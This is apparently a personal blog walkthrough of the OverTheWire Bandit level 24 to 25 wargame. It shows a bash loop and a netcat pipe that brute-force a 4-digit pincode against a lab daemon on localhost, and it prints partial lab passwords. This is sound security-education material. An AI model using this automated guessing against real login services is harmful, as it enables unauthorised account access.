Bandit Level 25 Walkthrough

Level 24 ➔ Level 25: Mastering Automated Brute-Forcing

1. My Objective

I am currently logged in as bandit24. My goal is to retrieve the password for Level 25 from a daemon (a background service) listening on port 30002 of localhost. To get the password, I must provide two things: the current password for bandit24 and a secret 4-digit pincode (ranging from 0000 to 9999).

The Technical Problem: There are 10,000 possible combinations (0000, 0001, 0002...). If I try to guess them manually, it would take days. I need to write a script that generates all 10,000 guesses and sends them to the server in a matter of seconds.

2. The Feynman Explanation: The Stubborn Padlock

How do I open a suitcase if I forgot the 4-digit code? I can't hack the lock; I have to try every single possibility.

The Keychain Analogy:

Imagine I have a giant keychain with 10,000 keys. I know that one of these keys opens the door.

I could pick up a key, try it, put it down, and pick up the next one. This is slow and exhausting. Instead, I build a Machine (a Bash Script).

The machine is programmed to take every key in order and shove it into the lock as fast as possible. It doesn't get tired and doesn't make mistakes. Brute-forcing is simply using the computer's speed to do the "dumb work" that a human is too slow to do. In this level, I am using a loop to "yell" all 10,000 codes at the server until it says "Yes!"

3. Practical Solution

I will write a script in my temporary directory that generates a list containing the bandit24 password and every pincode from 0000 to 9999. I will then send that entire list to the service at once.

# Step 1: I define my current password
bandit24@bandit:~$ PASS="VAfSAn929SAb36906sV..."

# Step 2: I use a 'for' loop to generate all combinations
# {0000..9999} automatically creates the sequence 0000, 0001, etc.
bandit24@bandit:~$ for i in {0000..9999}; do echo "$PASS $i"; done > /tmp/pritom_brute.txt

# Step 3: I send the entire file to port 30002 using netcat
bandit24@bandit:~$ cat /tmp/pritom_brute.txt | nc localhost 30002 | grep -v "Wrong"

# The grep -v "Wrong" hides all the failed attempts.
# After a moment, the correct password appears:
The password for bandit25 is p796Ng6pE6vSAr4S019SAb36906sV...

Why did I use grep -v "Wrong"?

When I send 10,000 lines to the server, it will reply 9,999 times with "Wrong! Please enter the correct pincode." This would flood my screen and make it impossible to see the one correct answer. The -v flag in grep stands for Invert-match. It tells Linux: "Show me every line EXCEPT the ones that say 'Wrong'." This leaves only the successful login message on my screen.

🚀 My Pro Tips: Efficient Brute-Forcing

✨ Speed Matters: Persistent Connections

The mission instructions say: "You do not need to create new connections each time." This is a huge hint. Opening and closing a network connection 10,000 times would be extremely slow and might get me blocked. By piping a single text file into nc, I am sending all 10,000 guesses through a single open tunnel, which is 100x faster.

⭐ Leading Zeros with printf

If I couldn't use the {0000..9999} shortcut, I would use printf "%04d\n" $i inside my loop. The %04d ensures that the number '1' becomes '0001'. In security, if you miss the leading zeros, your brute-force will fail.

🔍 Piping to a file

If the output is too large, I always pipe the results to a file (> output.txt) so I can search it later with grep or strings at my own pace.

4. Why this matters

I see brute-force attacks in the real world every day. This is exactly how bots try to log into your WordPress site or your SSH server by trying thousands of common passwords. As a security professional, knowing how easy it is to automate these attacks reminds me why we use Rate Limiting (locking an account after 5 failed attempts) and Multi-Factor Authentication (MFA) to stop attackers.

Lock Cracked!

I've successfully automated a network attack. I'll save this password and move on to Level 25 ➔ Level 26, where I will encounter a restricted shell!

Tags: #Linux #Bandit #OverTheWire #BruteForce #BashScripting #Loops #Netcat #CyberSecurity #FeynmanTechnique #CodeWithPritom #ProTips